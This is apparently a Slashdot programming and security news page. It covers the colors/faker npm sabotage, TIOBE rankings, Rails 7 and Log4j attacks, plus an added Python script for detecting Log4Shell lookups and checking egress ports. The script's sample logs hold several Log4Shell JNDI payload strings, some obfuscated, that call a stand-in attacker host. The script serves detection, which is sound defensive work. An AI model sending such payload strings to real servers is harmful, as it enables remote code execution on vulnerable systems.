Programming

GitHub Restores Account of Developer Who Intentionally Corrupted His Libraries (thenewstack.io) 193

What happened after a developer intentionally corrupted two of their libraries which collectively had more than 20 million weekly downloads and thousands of dependent projects?

Mike Melanson's "This Week in Programming" column reports: In response to the corrupted libraries, Microsoft quickly suspended his GitHub access and reverted the projects on npm.... While this might seem like an open and shut case to some — the developer committed malicious code and GitHub and npm did what it had to do to protect its users — a debate broke out around a developer's rights to do what they wish with their code, no matter how many projects and dependencies it may have.

"GitHub suspending someone's account for modifying their own code in a project they own however they want spooks me a lot more than NPM reverting a package," [tweeted one company's Director of Engineering & Technology]. "I kind of love what Marak did to make a point and protest to be honest."

An article on iProgrammer further outlines the dilemma present in what might otherwise seem like a clear-cut case.... "Yes, it is open source in that you can fork it and can contribute to it but does this mean that GitHub is justified in denying you the right to change or even destroy your own code?"

As of last night, however, it would appear that the entire affair is merely one for intellectual debate, as GitHub has indeed lived up to what some might view as its end of the bargain: the developer's account is active, he has been allowed to remove his faker.js library on GitHub (depended upon as it might be), and has since offered an update that he does "not have Donkey Brains".

Bitcoin

Jack Dorsey Announces Bitcoin Legal Defense Fund (cointelegraph.com) 23

Former Twitter CEO and Block founder Jack Dorsey has announced plans to create a "Bitcoin Legal Defense Fund" with Chaincode Labs co-founder Alex Morcos and Martin White, who appears to be an academic at the University of Sussex. CoinTelegraph reports: The announcement was sent on a mailing list for Bitcoin developers, bitcoin-dev, at 13:45 UTC on Wednesday from an email address appearing to belong to Dorsey. The announcement stated the fund will help provide a legal defense for Bitcoin developers, who are "currently the subject of multi-front litigation." "Litigation and continued threats are having their intended effect; individual defendants have chosen to capitulate in the absence of legal support," the email stated, referencing open-source developers who are often independent and, therefore, susceptible to legal pressure.

The announcement went on to describe the Bitcoin Legal Defense Fund as a "nonprofit entity that aims to minimize legal headaches that discourage software developers from actively developing Bitcoin and related projects." "The main purpose of this Fund is to defend developers from lawsuits regarding their activities in the Bitcoin ecosystem, including finding and retaining defense counsel, developing litigation strategy, and paying legal bills," it stated. Initially, the fund will include volunteers and part-time lawyers for developers to "take advantage of if they so wish," although, the email also states that "the board of the Fund will be responsible for determining which lawsuits and defendants it will help defend." According to the email, the fund's first project will be to take over the existing defense of Ramona Ang's "Tulip Trading Lawsuit" against developers for alleged misconduct over access to a Bitcoin (BTC) fortune.

Businesses

Wordle Copycats Have Vanished From Apple's App Store (polygon.com) 37

The many Wordle copycats that were flooding Apple's App Store seem to have disappeared. The apps appear to have been removed by Apple shortly after their existence caused a stir on social media. From a report: Wordle itself doesn't have an official iOS app so other developers looked to hop on the coattails of the game's success. But when one in particular started bragging on Twitter about the attention his version of the app was getting, he quickly caught heat, drawing attention to both his app and the many other Wordle clones on the App Store. While there are still a few five-letter word games on the store, they don't have the name Wordle attached like the most egregious ripoffs from the last few days have. Instead these games have names like PuzzWord. There are still a few games left on the App Store that are actually called Wordle, but one was released three years ago and the other was released five years ago with very different concepts from the surprise hit developed by Josh Wardle. While the apps are now gone from the store, the question of why they're gone remains open. There's been no official word from Apple on whether or not the apps were removed because they violated a store rule, or simply because Apple no longer wanted them on the App Store. Either way, for now the only way to play real Wordle on your phone is still to navigate to the website on a browser.

Programming

App Store Developers Made About $60 Billion in 2021, Apple Says (bloomberg.com) 18

Apple said that developers have generated more than $260 billion in revenue since the App Store launched in 2008, up about $60 billion from the figure it reported a year ago. From a report: The iPhone maker made the announcement Monday as part of a summary of the performance of its digital services across 2021. The company said the App Store generated a "new yearly record for App Store developer earnings last year" and that App Store sales between Christmas Eve and New Year's Eve rose in the double digits from the same period a year ago. Apple didn't say how much it generated during that week in 2021 but previously said it made $1.8 billion during that period of 2020.

Programming

Ask Slashdot: Why Do Programmers Make So Many Mistakes? (codinghorror.com) 391

A technical question occurred to Slashdot reader OneHundredAndTen when filling out forms online. "Are the programmers responsible for them stupid, incompetent, lazy, or all rolled into one?"

They provided two real-world examples that inspired the question:

- "I made up a company name that happened to contain a digit. When I submitted the information I got a big fat error diagnostic about this box, to the effect that numerals are not allowed in a company name. So you know, people — no digits allowed in your company's name, or else!"

- "In a free text box limited to 1,000 characters (already stupid, arguably) the caption explicitly banned the following characters in the "free text" because they can interfere with the correct processing of input..."

~!@#$%^&*()|'

This prompted a response from UnknownSoldier (Slashdot reader #67,820), who shared the humorous "Murphy's Computer Law" aphorisms from 1984, calling them "sadly still appropriate" and referring to one in particular: "There's never time to do it right, but always time to do it over." In general Web programmers tend to be extremely lazy (undisciplined.) They don't value correctness because that would take "work". I'm not just singling out web programmers here, look at how many programmers fuck up the TRIVIAL example of FizzBuzz.

For example, here are two examples where incompetent programmers make tons of assumptions.

* Falsehoods programmers believe about names
* Falsehoods programmers believe about time

As they say the devil is in the details, or edge case, as it may be. Programming is littered with edge cases so bad programmers "stick their head in the sand and ignore the problem hoping it will go away."

Doing it right costs time, money, and skill. Management is partially to blame. Bad programmers are to blame. Schools are to blame. There are many factors why we end up with shit software like the use case you just described.

And now you know why old programmers become grumpy. Modern software is slow, bloated, with layers of abstraction piled upon abstraction, library upon library. You spend more time "decoding" code and reverse engineering what was done because no one ever took the time to comment it properly for the next guy.

Use these examples of "stupid shit" to be a better programmer.

Agree? Disagree? Share your own thoughts in the comments.


Programming

Open Source Developer Intentionally Corrupts His Own Widely-Used Libraries (bleepingcomputer.com) 419

"Users of popular open-source libraries 'colors' and 'faker' were left stunned after they saw their applications, using these libraries, printing gibberish data and breaking.." reports BleepingComputer.

"The developer of these libraries intentionally introduced an infinite loop that bricked thousands of projects that depend on 'colors' and 'faker'." The colors library receives over 20 million weekly downloads on npm alone, and has almost 19,000 projects depending on it. Whereas, faker receives over 2.8 million weekly downloads on npm, and has over 2,500 dependents....

Yesterday, users of popular open-source projects, such as Amazon's Cloud Development Kit were left stunned on seeing their applications print gibberish messages on their console. These messages included the text 'LIBERTY LIBERTY LIBERTY' followed by a sequence of non-ASCII characters... The developer, named Marak Squires added a "new American flag module" to colors.js library yesterday in version v1.4.44-liberty-2 that he then pushed to GitHub and npm. The infinite loop introduced in the code will keep running indefinitely; printing the gibberish non-ASCII character sequence endlessly on the console for any applications that use 'colors.' Likewise, a sabotaged version '6.6.6' of faker was published to GitHub and npm....

The reason behind this mischief on the developer's part appears to be retaliation — against mega-corporations and commercial consumers of open-source projects who extensively rely on cost-free and community-powered software but do not, according to the developer, give back to the community. In November 2020, Marak had warned that he will no longer be supporting the big corporations with his "free work" and that commercial entities should consider either forking the projects or compensating the dev with a yearly "six figure" salary....

Some dubbed this an instance of "yet another OSS developer going rogue," whereas InfoSec expert VessOnSecurity called the action "irresponsible," stating: "If you have problems with business using your free code for free, don't publish free code. By sabotaging your own widely used stuff, you hurt not only big business but anyone using it. This trains people not to update, 'coz stuff might break."

GitHub has reportedly suspended the developer's account. And, that too, has caused mixed reactions... "Removing your own code from [GitHub] is a violation of their Terms of Service? WTF? This is a kidnapping. We need to start decentralizing the hosting of free software source code," responded software engineer Sergio Gómez.

"While it looks like color.js has been updated to a working version, faker.js still appears to be affected, but the issue can be worked around by downgrading to a previous version (5.5.3)," reports the Verge: Even more curiously, the faker.js Readme file has also been changed to "What really happened with Aaron Swartz...?"

Squires' bold move draws attention to the moral — and financial — dilemma of open-source development, which was likely the goal of his actions.

Python

TIOBE Announces that the Programming Language of the Year Was Python (thenextweb.com) 90

The programming language of the year has been announced by the TIOBE Index: Python!

But noting that the TIOBE index is based on the number of search results for a programming language across popular search engines, a headline at The Next Web asks: "What does this title even mean?" [TIOBE] takes services such as Google, QQ, Sohu, Amazon, and Wikipedia to calculate the results. TIOBE uses a `+"<language> programming"` query and a special formula to devise these ratings that change every month. You can read more about the whole process here. The programming language of the year title is decided by the jump in ratings year-on-year. Python overtook C# by a margin of 0.13% — almost a photo finish.

The index doesn't indicate the best or most efficient programming language, nor does it measure the amount of code written in a language across the internet. It simply gives us a high-level understanding of resources and pages available on the web related to them.

There's a huge amount of criticism towards the TIOBE index, especially as it uses one query and doesn't consider non-English languages. The organization said that it's trying to introduce more parameters to calculate the ratings.

TIOBE's annual award is being called "prestigious" — by the announcement at TIOBE.com: The award is given to the programming language that has gained the highest increase in ratings in one year. C# was on its way to get the title for the first time in history, but Python surpassed C# in the last month.

Python started at position #3 of the TIOBE index at the beginning of 2021 and left both Java and C behind to become the number one of the TIOBE index. But Python's popularity didn't stop there. It is currently more than 1 percent ahead of the rest [with a "rating" of 13.58%]. Java's all time record of 26.49% ratings in 2001 is still far away, but Python has it all to become the de facto standard programming language for many domains. There are no signs that Python's triumphal march will stop soon.

In fact, this makes the second year in a row Python has won TIOBE's annual award.

But it's as good a conversation-starter as any. ZDNet reminds us that Microsoft hired Python creator Guido van Rossum in 2020 to work on improving Python's efficiency, while the second most popular language on TIOBE's annual list, C#, "is a language designed by Microsoft technical fellow Anders Hejlsberg for the .NET Framework and Microsoft's developer editing tool Visual Studio."

And ZDNet also spotted a few other patterns in TIOBE's year-end look at programming language popularity: There were several movers and shakers this year. Rust, a systems programming language that deals with memory safety flaws, is now in 26th position, ahead of MIT's Julia, and Kotlin, a language endorsed by Google for Android app development. Rust was a stand out language in 2021, gaining backing from Facebook, Amazon Web Services, Microsoft Azure and Google Cloud.

Apple's Swift for iOS and macOS app development jumped from 13th to 10th place, while Google's Go inched up from 14 to 13, according to Tiobe. Kotlin moved from 40th to 29th. Google's Dart dropped from 25th to 37th position, Julia fell from 23rd to 28th position, while Microsoft TypeScript dropped from 42 to 49.

The top 10 languages in Tiobe's list for January 2022 were Python, C, Java, C++, C#, Visual Basic, JavaScript, Assembly Language, SQL, and Swift.

Programming

'A Quadrillion Mainframes On Your Lap' (ieee.org) 101

"Your laptop is way more powerful than you might realize," writes long-time Slashdot reader fahrbot-bot.

"People often rhapsodize about how much more computer power we have now compared with what was available in the 1960s during the Apollo era. Those comparisons usually grossly underestimate the difference."

Rodney Brooks, emeritus professor of robotics at MIT (and former director of their AI Lab and CSAIL) explains in IEEE Spectrum: By 1961, a few universities around the world had bought IBM 7090 mainframes. The 7090 was the first line of all-transistor computers, and it cost US $20 million in today's money, or about 6,000 times as much as a top-of-the-line laptop today. Its early buyers typically deployed the computers as a shared resource for an entire campus. Very few users were fortunate enough to get as much as an hour of computer time per week.

The 7090 had a clock cycle of 2.18 microseconds, so the operating frequency was just under 500 kilohertz. But in those days, instructions were not pipelined, so most took more than one cycle to execute. Some integer arithmetic took up to 14 cycles, and a floating-point operation could hog up to 15. So the 7090 is generally estimated to have executed about 100,000 instructions per second. Most modern computer cores can operate at a sustained rate of 3 billion instructions per second, with much faster peak speeds. That is 30,000 times as fast, so a modern chip with four or eight cores is easily 100,000 times as fast.

Unlike the lucky person in 1961 who got an hour of computer time, you can run your laptop all the time, racking up more than 1,900 years of 7090 computer time every week....

But, really, this comparison is unfair to today's computers. Your laptop probably has 16 gigabytes of main memory. The 7090 maxed out at 144 kilobytes. To run the same program would require an awful lot of shuffling of data into and out of the 7090 — and it would have to be done using magnetic tapes. The best tape drives in those days had maximum data-transfer rates of 60 KB per second. Although 12 tape units could be attached to a single 7090 computer, that rate needed to be shared among them. But such sharing would require that a group of human operators swap tapes on the drives; to read (or write) 16 GB of data this way would take three days. So data transfer, too, was slower by a factor of about 100,000 compared with today's rate.

So now the 7090 looks to have run at about a quadrillionth (10 ** -15) the speed of your 2021 laptop. A week of computing time on a modern laptop would take longer than the age of the universe on the 7090.

Businesses

Skillsoft To Acquire Codecademy For $525 Million 6

theodp writes: Online coding lesson purveyor Codecademy, the 2011 YCombinator graduate which arguably kicked off the "Everyone Should Learn to Code" movement with a New Year's 2012 endorsement from then NYC Mayor Michael Bloomberg that went viral, has entered into an agreement to be acquired by Skillsoft for approximately $525 million in cash and stock (SEC 8-K filing). "Like Codecademy," explained Codecademy CEO Zach Sims, "Skillsoft believes in a world where every person and every team has the opportunity to realize their full potential through learning, and together we will continue building that world." According to Crunchbase, Codecademy had raised a total of $87.5 million in funding.

Security

Second Ransomware Family Exploiting Log4j Spotted In US, Europe (venturebeat.com) 16

Researchers say a second family of ransomware has been growing in usage for attack attempts that exploit the critical vulnerability in Apache Log4j, including in the U.S. and Europe. VentureBeat reports: A number of researchers, including at cybersecurity giant Sophos, have now said they've observed the attempted deployment of a ransomware family known as TellYouThePass. Researchers have described TellYouThePass as an older and largely inactive ransomware family -- which has been revived following the discovery of the vulnerability in the widely used Log4j logging software. TellYouThePass is the second family of ransomware that's been observed to exploit the vulnerability in Log4j, known as Log4Shell, joining the Khonsari ransomware, according to researchers.

While previous reports indicated that TellYouThePass was mainly being directed against targets in China, researchers at Sophos told VentureBeat that they've observed the attempted delivery of TellYouThePass ransomware both inside and outside of China -- including in the U.S. and Europe. "Systems in China were targeted, as well as some hosted in Amazon and Google cloud services in the U.S. and at several sites in Europe," said Sean Gallagher, a senior threat researcher at Sophos Labs, in an email to VentureBeat on Tuesday. Sophos detected attempts to deliver TellYouThePass payloads by utilizing the Log4j vulnerability on December 17 and December 18, Gallagher said. TellYouThePass has versions that run on either Linux or Windows, "and has a history of exploiting high-profile vulnerabilities like EternalBlue," said Andrew Brandt, a threat researcher at Sophos, in an email. The Linux version is capable of stealing Secure Socket Shell (SSH) keys and can perform lateral movement, Brandt said. Sophos initially disclosed its detection of TellYouThePass ransomware in a December 20 blog post.

The first report of TellYouThePass ransomware exploiting the Log4j vulnerability appears to have come from the head of Chinese cybersecurity group KnownSec 404 Team on December 12. The attempted deployment of TellYouThePass in conjunction with Log4Shell was subsequently confirmed by additional researchers, according to researcher community Curated Intelligence. In a blog post Tuesday, Curated Intelligence said its members can now confirm that TellYouThePass has been seen exploiting the vulnerability "in the wild to target both Windows and Linux systems." TellYouThePass had most recently been observed in July 2020, Curated Intelligence said. It joins Khonsari, a new family of ransomware identified in connection with exploits of the Log4j vulnerability.

Security

Belgian Defense Ministry Confirms Cyberattack Through Log4j Exploitation (zdnet.com) 10

An anonymous reader quotes a report from ZDNet: The Belgian Ministry of Defense has confirmed a cyberattack on its networks that involved the Log4j vulnerability. In a statement, the Defense Ministry said it discovered an attack on its computer network with internet access on Thursday. They did not say if it was a ransomware attack but explained that "quarantine measures" were quickly put in place to "contain the infected elements." "Priority was given to the operability of the network. Monitoring will continue. Throughout the weekend, our teams were mobilized to contain the problem, continue our operations and alert our partners," the Defense Ministry said. "This attack follows the exploitation of the Log4j vulnerability, which was made public last week and for which IT specialists around the world are jumping into the breach. The Ministry of Defense will not provide any further information at this stage."

Multiple reports from companies like Google and Microsoft have indicated that government hacking groups around the world are leveraging the Log4j vulnerability in attacks. [...] Centre for Cybersecurity Belgium spokesperson Katrien Eggers told ZDNet that they too sent out a warning to Belgian companies about the Apache Log4j software issue, writing that any organization that had not already taken action should "expect major problems in the coming days and weeks." "Because this software is so widely distributed, it is difficult to estimate how the discovered vulnerability will be exploited and on what scale," the Centre for Cybersecurity Belgium said, adding that any affected organizations should contact them. "It goes without saying that this is a dangerous situation."

Businesses

Inside Ubisoft's Unprecedented 'Exodus' of Developers (axios.com) 36

Colleagues across Ubisoft have names for the procession of developers who have departed over the past 18 months: "the great exodus" and "the cut artery." Across the company's global network of studios, which at 20,000-plus employees is one of gaming's largest workforces, many developers have decided it's time to quit. And many of their colleagues describe a flow of goodbyes that they've never seen before. Axios reports: Top-name talent is leaving, with at least five of the top 25-credited people from the company's biggest 2021 game, Far Cry 6, already gone. Twelve of the top 50 from last year's biggest Ubisoft release, Assassin's Creed Valhalla, have left too. (A 13th recently returned.) Also out are midlevel and lower-level workers as headcounts drop, particularly in Ubisoft's large and normally growing Canadian studios. LinkedIn shows Ubisoft's Montreal and Toronto studios each down at least 60 total workers in the last six months. Two current developers tell Axios the departures have stalled or slowed projects. One developer recently said a colleague currently at Ubisoft contacted them to solve an issue with a game, because no one was still there who knew the system.

Interviews with a dozen current and former Ubisoft developers cite a range of factors for the departures, including low pay, an abundance of competitive opportunities, frustration at the company's creative direction, and unease at Ubisoft's handling of a workplace misconduct scandal that flared in mid-2020. One developer with more than a decade of experience at Ubisoft before recently leaving said the company is "an easy target for recruiters," given the company's myriad issues. Said another now-former Ubisoft worker who was disappointed by directives from the company's Paris HQ: "There's something about management and creative scraping by with the bare minimum that really turned me away." Many spoke fondly of much of their time at the company, and one said they'd even consider returning, but the past year and a half was a breaking point.

"Management says it's on top of it, telling Axios that attrition is up but that the company has hired 2,600 workers since April," the report adds.

"A spokesperson noted that questions in a recent companywide survey, about whether employees are happy at the company and would 'recommend Ubisoft as a great place to work,' returned a score of 74, which they said was in line with the industry average."

Google

More Than 35,000 Java Packages Impacted by Log4j Vulnerabilities, Google Says (therecord.media) 39

Google's open-source team said they scanned Maven Central, today's largest Java package repository, and found that 35,863 Java packages use vulnerable versions of the Apache Log4j library. From a report: This includes Java packages that use Log4j versions vulnerable to the original Log4Shell exploit (CVE-2021-44228) and a second remote code execution bug discovered in the Log4Shell patch (CVE-2021-45046). James Wetter and Nicky Ringland, members of the Google Open Source Insights Team, said in a report today that when a major Java security flaw is found, it typically tends to affect only 2% of the Maven Central index. However, the 35,000 Java packages vulnerable to Log4Shell account for roughly 8% of the Maven Central total of ~440,000, a percentage the two described using just one word -- "enormous." But since the vulnerability was disclosed last week, Wetter and Ringland said the community has responded positively and has already fixed 4,620 of the 35,863 packages they initially found vulnerable. This number accounts for 13% of all the vulnerable packages.

Programming

Ruby on Rails Creator Touts 7.0 as One-Person Framework, 'The Way It Used To Be' (hey.com) 62

David Heinemeier Hansson is the creator of Ruby on Rails (as well as the co-founder and CTO of Basecamp, makers of the email software HEY). But he says Wednesday's release of version 7.0 is the version he's been longing for, "The one where all the cards are on the table. No more tricks up our sleeves. The culmination of years of progress on five different fronts at once." The backend gets some really nice upgrades, especially with the encryption work that we did for HEY, so your data can be encrypted while it's live in the database.... But it's on the front end things have made a quantum leap. We've integrated the Hotwire frameworks of Stimulus and Turbo directly as the new defaults, together with that hot newness of import maps, which means you no longer need to run the whole JavaScript ecosystem enchilada in your Ruby app...

The part that really excites me about this version, though, is how much closer it brings us to the ideal of The One Person Framework. A toolkit so powerful that it allows a single individual to create modern applications upon which they might build a competitive business. The way it used to be... Rails 7 seeks to be the wormhole that folds the time-learning-shipping-continuum, and allows you to travel grand distances without knowing all the physics of interstellar travel. Giving the individual rebel a fighting chance against The Empire....

The key engine powering this assault is conceptual compression. Like a video codec that throws away irrelevant details such that you might download the film in real-time rather than buffer for an hour. I dedicated an entire RailsConf keynote to the idea...

[I]f there ever was an opening, ever was a chance that we might at least tilt the direction of the industry, now is it.

What a glorious time to be working in web development.

Programming

Is Wolfram the Smartest Programming Language In the Room? (wolfram.com) 113

theodp writes: Out of the box, does your programming language support Chemical Formulas & Chemical Reactions? Making Videos from Images & Videos? Integrals? Real Numbers? Graph Trees? Leap Seconds? Bio Sequences? Flight Data? Vector Displacement Plots? Lighting? Machine Learning? Tracking Robots? Notebooks? Creating, Deploying and Grading Quizzes? Analysis of Email Threads? Access to 2,249 User-Defined Functions? NFTs?

These are just some of the feature upgrades Stephen Wolfram touched upon as he announced the launch of Version 13 of Wolfram Language and Mathematica in a Dec. 13th blog post (for more, see What's New in Mathematica 13). Sign up for free access to Wolfram Cloud Basic here, kids! So, is Wolfram the "smartest programming language in the room"?

Java

Security Firm Blumira Discovers Major New Log4j Attack Vector (zdnet.com) 91

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI), default port 1099, although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, once an open port to a local service or a service accessible to the host is found, it can drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants.

Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports."
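The two defensive points in the story, spotting a JNDI lookup string planted in a request path or parameter and checking that only approved hosts send traffic on the ports named above (53, 389, 636, 1099), can both be scripted. The following is an added example written for this page, not Blumira's or ZDNet's code; the log lines, flow records and host names are constructed, and the nested-lookup forms it collapses are the documented Log4j 2 `${lower:...}` and `${...:-default}` substitutions.

```python
"""Flag Log4Shell-style JNDI lookups in request logs and check egress flows.
Added example with constructed sample data; not from the article."""
import re
from urllib.parse import unquote

# Ports the quoted Blumira guidance restricts: DNS, LDAP, LDAPS, Java RMI.
RESTRICTED_EGRESS_PORTS = {53, 389, 636, 1099}

# In Log4j 2, ${lower:x}/${upper:x} and ${anything:-x} both resolve to x, so
# the keyword 'jndi' can be split across nested lookups. Collapse them first.
_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|nis)\s*:\s*//?([^/}\s]*)",
    re.IGNORECASE,
)


def normalize(text, max_passes=8):
    """URL-decode (twice, for double encoding) and collapse nested lookups,
    innermost first, a bounded number of times."""
    text = unquote(unquote(text))
    for _ in range(max_passes):
        collapsed = _DEFAULT.sub(lambda m: m.group(1),
                                 _CASE.sub(lambda m: m.group(1), text))
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookups(line):
    """Return (protocol, target) pairs for every JNDI lookup in one log line."""
    return [(proto.lower(), target) for proto, target in _JNDI.findall(normalize(line))]


def egress_violations(flows, allowed_senders):
    """Return outbound flows (src_host, dst_ip, dst_port) that use a restricted
    port from a host that is not on the allowlist."""
    return [f for f in flows if f[2] in RESTRICTED_EGRESS_PORTS and f[0] not in allowed_senders]


# Constructed sample request paths and flow records (RFC 5737 test addresses).
SAMPLE_LOG = [
    "GET /api/${jndi:rmi://198.51.100.7:1099/a} HTTP/1.1",
    "GET /login?user=${${lower:j}ndi:${lower:l}dap://198.51.100.7:389/x} HTTP/1.1",
    "GET /search?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fy%7D HTTP/1.1",
    "GET /healthz HTTP/1.1",
]
SAMPLE_FLOWS = [("dev-laptop-12", "198.51.100.7", 1099), ("dns-resolver-1", "203.0.113.53", 53),
                ("build-agent-3", "198.51.100.7", 389), ("web-01", "203.0.113.10", 443)]
ALLOWED_SENDERS = {"dns-resolver-1", "ldap-proxy-1"}
```

Running `find_jndi_lookups` over the sample log reports the RMI and both LDAP lookups and nothing for the health check, while `egress_violations` flags the developer laptop and build agent, the kinds of non-exposed hosts the WebSocket vector reaches.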
Programming

Apple Releases Swift Playgrounds 4 (techcrunch.com) 8

Apple announced that it has officially released Swift Playgrounds 4. The tech giant first announced the upcoming launch of the new software at WWDC earlier this year. From a report: With this latest launch, the software now lets users build iPhone and iPad apps with SwiftUI directly on their iPad. It also allows you to preview apps in real time as you make changes to your app. Apple notes that developers are now able to upload their finished app to the App Store with its "App Store Connect" integration. "Swift Playgrounds is the best and easiest way to learn how to code," Apple said in a blog post. "Code is immediately reflected in the live preview as you build apps, and you can run your apps full screen to test them out. A new open project format based on Swift packages can be opened and edited in Swift Playgrounds for iPad, as well as within Xcode on Mac, offering you even more versatility to develop apps across iPad and Mac."
Programming

At EA, It Can Take a Whole Day To Change 3 Lines of Code (neowin.net) 145

New submitter segaboy81 writes: In 2001 the Manifesto for Agile Software Development was born, and it took the software engineering world by storm. Linux, Windows, Facebook, AAA games, and just about everything else adheres to this manifesto in some form or another. It is a paradigm that allows teams to work collaboratively on projects in the most effective and streamlined way possible. However, EA may not have gotten the memo. According to a blog post by former EA developer Adam Berg, different teams take very different approaches to development, with one team in particular being especially slow to progress. Adam recounts his experience on the FIFA team, where he worked on the Wii, PS Vita, and Nintendo 3DS ports of the game: "I often worked in the realm of competition logic. Testing changes here could mean progressing through several seasons of career mode in order to test out a change. No joke, it would take an entire day to change 3 lines of code and know that it actually worked correctly."
Programming

The Linux Kernel's Second Language? Rust Gets Another Step Closer (phoronix.com) 116

"In 2022 we will very likely see the experimental Rust programming language support within the Linux kernel mainlined," writes Phoronix, citing patches sent out Monday "introducing the initial support and infrastructure around handling of Rust within the kernel."

This summer saw the earlier patch series posted for review and discussion around introducing Rust programming language support in the Linux kernel to complement its longstanding C focus. In the months since there has been more progress on enabling Rust for Linux kernel development, Linus Torvalds is not opposed to it, and others are getting on board with the effort. Rust for the Linux kernel remains of increasing interest to developers over security concerns, with Rust affording more memory safety protections, potentially lowering the barrier to contributing to the kernel, and other related benefits....

Miguel Ojeda sent out the "v2" patches for Rust support in the kernel. With these updated packages, the Rust code is now relying on stable Rust releases rather than the beta compiler state previously, new modularization options added, stricter code enforcements, extra Rust compiler diagnostics enabled, new abstractions for in-kernel use, and other low-level code improvements.

Red Hat is also now joining Arm, Google, and Microsoft in voicing their support for Rust code within the Linux kernel.

ZDNet contributing editor Steven J. Vaughan-Nichols also expects the first Rust code in Linux's kernel sometime in 2022: As Ryan Levick, a Microsoft principal cloud developer advocate, explained, "Rust is completely memory safe." Since roughly two-thirds of security issues can be traced back to handling memory badly, this is a major improvement. In addition, "Rust prevents those issues usually without adding any runtime overhead," Levick said.
